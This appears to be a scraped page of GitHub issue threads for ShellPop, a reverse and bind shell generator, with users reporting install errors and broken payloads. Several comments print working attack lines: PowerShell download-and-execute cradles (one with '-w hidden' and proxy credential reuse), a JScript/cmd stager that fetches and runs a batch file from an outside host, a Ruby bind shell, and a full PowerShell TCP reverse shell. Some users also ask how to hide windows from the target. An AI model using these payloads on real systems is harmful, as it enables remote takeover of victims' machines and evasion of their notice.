0x00-0x00 / shellpop Goto Github PK

Hello, Congratulations for the tool it is very good, I am with some doubts, I used a shell poweshell and the metasploit framework with handler, apparently appeared that I would get a meterpreter session, but simply got locked the terminal without opening the meterpreter session, my doubt and if it is possible to get the meterpreter session with the shellpop, something else I think would be interesting to put in the poweshell and -w hidden codes to make it hidden after running.
Tanks.

Here is another shell creator script with some additional ways.

https://github.com/mthbernardes/rsg/blob/master/shells.txt

ShellPop is incompatible with python3 due to inentation error in ./bin/shellpop.

$ python3 bin/shellpop

  File "bin/shellpop", line 811
    try:
       ^
TabError: inconsistent use of tabs and spaces in indentation

In python & other interpreted language projects, it is a good practice to provide a setup routine, as an equivalent of the traditional make install.
Therefore, the installation (here, setup.py) should always be optional, and the user should be able to run the project as soon as it was cloned.
Most people like to test a tool before actually installing or packaging it into their system (this assertion is even more true for pentesters, who clone & test tools thousands of times per year)

After installing requirement, and installing setup still got error !

Traceback (most recent call last):
File "/usr/local/bin/shellpop", line 4, in
import('pkg_resources').run_script('shellpop==0.3.5', 'shellpop')
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 765, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 1545, in run_script
exec(code, namespace, namespace)
File "/usr/local/lib/python3.6/dist-packages/shellpop-0.3.5-py3.6.egg/EGG-INFO/scripts/shellpop", line 30, in
from shellpop import *
File "/usr/local/lib/python3.6/dist-packages/shellpop-0.3.5-py3.6.egg/shellpop/init.py", line 1, in
from bind import *
ModuleNotFoundError: No module named 'bind'

Powershell reverse-shell (number 22)
cmd used
--number 22 -H localhost -P 2323 --reverse --stager http

This will not work if the system is using proxy. taking cue from metasploit web delivery if we include

powershell.exe -nop -w hidden -c $d=new-object net.webclient;$d.proxy=[Net.WebRequest]::GetSystemWebProxy();$d.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $d.downloadstring('<URL>');

instead of the current

powershell.exe -nop -ep bypass -Command 'iex (new-object system.net.webclient).downloadString(\"http://localhost:80/sfLkhXIg\")'

Hi there! I'm excited to use this. Thank you so much for your contribution to the community and hard work!!

Just getting started and noticed that a module was missing from requirements.

Traceback (most recent call last):
  File "/usr/local/bin/shellpop", line 4, in <module>
    __import__('pkg_resources').run_script('shellpop==0.3.5', 'shellpop')
  File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 748, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 1517, in run_script
    exec(code, namespace, namespace)
  File "/usr/local/lib/python2.7/dist-packages/shellpop-0.3.5-py2.7.egg/EGG-INFO/scripts/shellpop", line 22, in <module>
    import netifaces
ImportError: No module named netifaces

Hope this helps! Thanks again.

Hello, how can we hide all of the cmd windows that popup when executing the below cmd.exe command?

$ shellpop --reverse --number 21 --host 192.168.1.55 --handler --base64 --powershell-random-case --stager http --http-port 2226 --port 3336
[+] Choose a stager: 
1. CertUtil Windows HTTP Stager
2. VBScript Windows HTTP Stager
[+] Stager number: 2


[+] Started HTTP server at port 2226
[+] Staged file has been named 'SkHEjSdH'
[+] Execute this code in remote target: 

cmd.exe /c "echo var H = new ActiveXObject("WinHttp.WinHttpRequest.5.1");H.Open("GET", "http://192.168.1.55:2226/SkHEjSdH", /*async=*/false);H.Send();B = new ActiveXObject("ADODB.Stream");B.Type = 1;B.Open();B.Write(H.ResponseBody);B.SaveToFile("SkHEjSdH.bat");S = new ActiveXObject("Wscript.Shell");S.run("SkHEjSdH.bat");" > SkHEjSdH.js && cmd.exe /c "cscript SkHEjSdH.js"

As I was going though all the bind shells testing for an upcoming PR, I noticed that I could not get the linux/bind/tcp/ruby shell to work. Every time I ran it I got this error from sh:

ruby -rsocket -e 'f=TCPServer.new(1337);s=f.accept;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",s,s,s)'
sh: 1: 8: Bad file descriptor

From the looks of it, I'm guessing bash doesn't like f.accept as a file descriptor, but not sure how to fix that. My ruby knowledge is very little.

I've run into an issue with powershell reverse shell payloads 9 and 25 if generated as described below. Tested it on Windows 7 x86 and Windows 10 x64. If fails on both. I'm no powershell guru so I'm not sure how to fix it.

• shellpop -H eth0 -P 4444 --reverse --number 9
• shellpop -H eth0 -P 4444 --reverse --number 25

This is the execution output:
powershell.exe -nop -ep bypass -Command "$xDHvvVTgtya='xx.xx.xx.xx';$GYhNfQRZIEYm=xxx;$lDUkaAa= New-Object System.Net.Sockets.TCPClient($xDHvvVTgtya,$GYhNfQRZIEYm);$GcIjoaNgvqG =$lDUkaAa.GetStream();[byte[]]$SJsnAdmfrbsJLjF=0..65535|:ASCII).GetBytes('PS '+( Get-Location).Path+'> ');$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);while(($ kcoITwLMzujjdk=$GcIjoaNgvqG.Read($SJsnAdmfrbsJLjF,0,$SJsnAdmfrbsJLjF.Length)) -n e 0){$HQjgMvUcOUSKh=([text.encoding]::ASCII).GetString($SJsnAdmfrbsJLjF,0,$kcoIT wLMzujjdk);try{$KDUugHGsudblDb=(Invoke-Expression -c $HQjgMvUcOUSKh 2>&1|Out-Str ing)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$xDHvvVTgtya0=$KDUugHGsudblDb+'PS '+(Get-Location).Pat h+'> ';$xDHvvVTgtya1=($xDHvvVTgtya2[0]|Out-String);$xDHvvVTgtya2.clear();$xDHvvV Tgtya0=$xDHvvVTgtya0+$xDHvvVTgtya1;$cPLlmQj=([text.encoding]::ASCII).GetBytes($x DHvvVTgtya0);$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);$GcIjoaNgvqG.Flush() ;};$lDUkaAa.Close();if($xDHvvVTgtya3){$xDHvvVTgtya3.Stop();};"

And the error on Win7:
Unexpected token ')' in expression or statement. $xDHvvVTgtya='192.168.247.129';$GYhNfQRZIEYm=4444;$lDUkaAa=New-Object System. Net.Sockets.TCPClient($xDHvvVTgtya,$GYhNfQRZIEYm);$GcIjoaNgvqG=$lDUkaAa.GetStre am();[byte[]]$SJsnAdmfrbsJLjF=0..65535|:ASCII) <<<< .GetBytes('PS '+(Get-Locati on).Path+'> ');$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);while(($kcoITwLMz ujjdk=$GcIjoaNgvqG.Read($SJsnAdmfrbsJLjF,0,$SJsnAdmfrbsJLjF.Length)) -ne 0){$HQ jgMvUcOUSKh=([text.encoding]::ASCII).GetString($SJsnAdmfrbsJLjF,0,$kcoITwLMzujj dk);try{$KDUugHGsudblDb=(Invoke-Expression -c $HQjgMvUcOUSKh 2>&1|Out-String)}c atch{Write-Warning 'Something went wrong with execution of command on the targe t.';Write-Error $_;};$xDHvvVTgtya0=$KDUugHGsudblDb+'PS '+(Get-Location).Path+'> ';$xDHvvVTgtya1=($xDHvvVTgtya2[0]|Out-String);$xDHvvVTgtya2.clear();$xDHvvVTgt ya0=$xDHvvVTgtya0+$xDHvvVTgtya1;$cPLlmQj=([text.encoding]::ASCII).GetBytes($xDH vvVTgtya0);$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);$GcIjoaNgvqG.Flush(); };$lDUkaAa.Close();if($xDHvvVTgtya3){$xDHvvVTgtya3.Stop();}; CategoryInfo : ParserError: ():String) [], ParentContainsErrorR ecordException FullyQualifiedErrorId : UnexpectedToken

Slightly different error, maybe more helpful, in Win10:
At line:1 char:196 ... KX=$XnBJSVNr.GetStream();[byte[]]$GQrahNYaUV=0..65535|:ASCII).GetByte ... ~ Unexpected token ')' in expression or statement. CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException FullyQualifiedErrorId : UnexpectedToken

Just my 2 cents:
The method number is the worst part of an awesome code. if instead of number user can input something recognizable like say language or extension like ps1 for powershell php aspx asp cmd etc that would be more useful and quick to remember and recall.

Thanks!

OS: Kali GNU/Linux Rolling
Python version: Python 2.7.15+

There seems to be a problem with the handler of reverse shell number 1.
The complete error is:

[+] Port Already used by another Program or Something Wrong... 2018 ./extras/c-ares-1.6.0/ares_gethostbyaddr.lo                                                                                             
Traceback (most recent call last):
  File "/usr/local/bin/shellpop", line 858, in <module>
    main()
  File "/usr/local/bin/shellpop", line 840, in main
    sys.exit()
NameError: global name 'sys' is not defined

The command I executed was:

$ shellpop --reverse --number 1 --handler --host xx.xx.xx.xx --port xxxx 

It gave me an initial shell and after executing find, I got this error and the shell closed.

I am available for any more info.
Thanks in advance

I've insalled ShellPop in a venv, in the latest kali. I'm using a python 2.7.18 venv.

After the installation of the requirements, I've got an import error :

bin/shellpop --list
Traceback (most recent call last):
  File "bin/shellpop", line 18, in <module>
    import pyperclip
ImportError: No module named pyperclip

However, pyperclip is correctly installed !

Any ideas of a solution ?

Thanks !

The arguments --powershell-x64 and --powershell-x86 arguments seem to prefix the wrong path to the payload. In fact, I believe they are reversed.

root@home:~# shellpop -H eth0 -P 1234 --powershell-x64 --reverse --number 9
[+] Execute this code in remote target:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [...]

root@home:~# shellpop -H eth0 -P 1234 --powershell-x86 --reverse --number 9
[+] Execute this code in remote target:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [...]